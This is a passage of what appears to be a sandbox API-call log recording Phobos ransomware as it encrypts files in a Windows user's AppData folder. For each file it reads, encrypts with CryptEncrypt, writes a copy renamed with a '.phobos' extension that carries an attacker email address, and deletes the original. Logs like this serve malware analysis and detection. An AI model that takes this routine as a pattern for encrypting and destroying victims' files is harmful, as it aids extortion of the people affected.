home~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.370] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.370] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.371] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.371] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7000, lpOverlapped=0x0) returned 1 [0186.391] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010, dwBufLen=0x7010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010) returned 1 [0186.391] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7010, lpOverlapped=0x0) returned 1 [0186.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0186.394] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.394] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0186.394] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.394] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0186.394] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.394] CloseHandle (hObject=0x194) returned 1 [0186.394] CloseHandle (hObject=0x12c) returned 1 [0186.394] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms")) returned 1 [0186.395] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.396] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=28672) returned 1 [0186.396] CloseHandle (hObject=0x12c) returned 1 [0186.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms")) returned 0x2020 [0186.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.397] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.397] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.397] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.397] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.397] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7000, lpOverlapped=0x0) returned 1 [0186.439] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010, dwBufLen=0x7010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010) returned 1 [0186.439] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7010, lpOverlapped=0x0) returned 1 [0186.441] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0186.441] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.441] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0186.441] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.441] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0186.441] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.441] CloseHandle (hObject=0x12c) returned 1 [0186.441] CloseHandle (hObject=0x194) returned 1 [0186.441] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms")) returned 1 [0186.442] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.443] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=28672) returned 1 [0186.443] CloseHandle (hObject=0x194) returned 1 [0186.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms")) returned 0x2020 [0186.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.443] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.444] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.445] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.445] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.445] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7000, lpOverlapped=0x0) returned 1 [0186.504] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010, dwBufLen=0x7010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7010) returned 1 [0186.504] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7010, lpOverlapped=0x0) returned 1 [0186.505] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0186.505] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.505] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0186.505] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.505] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0186.505] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.505] CloseHandle (hObject=0x194) returned 1 [0186.505] CloseHandle (hObject=0x12c) returned 1 [0186.506] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms")) returned 1 [0186.507] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.507] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=69740) returned 1 [0186.507] CloseHandle (hObject=0x12c) returned 1 [0186.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb")) returned 0x2020 [0186.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.508] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.508] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.509] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.509] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.509] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1106c, lpOverlapped=0x0) returned 1 [0186.511] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x11070, dwBufLen=0x11070 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x11070) returned 1 [0186.512] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x11070, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x11070, lpOverlapped=0x0) returned 1 [0186.514] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0186.514] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.514] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0186.514] CryptDestroyKey (hKey=0xa32c28) returned 1 [0186.514] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0186.514] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.514] CloseHandle (hObject=0x12c) returned 1 [0186.514] CloseHandle (hObject=0x194) returned 1 [0186.515] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb")) returned 1 [0186.516] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.518] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1044) returned 1 [0186.518] CloseHandle (hObject=0x194) returned 1 [0186.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl")) returned 0x2020 [0186.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.518] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.518] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0186.519] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0186.519] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.519] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x414, lpOverlapped=0x0) returned 1 [0186.575] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420, dwBufLen=0x420 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420) returned 1 [0186.575] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x420, lpOverlapped=0x0) returned 1 [0186.576] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0186.576] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.576] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.576] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.576] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.576] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.576] CloseHandle (hObject=0x194) returned 1 [0186.576] CloseHandle (hObject=0x12c) returned 1 [0186.576] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\01_music_auto_rated_at_5_stars.wpl")) returned 1 [0186.577] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 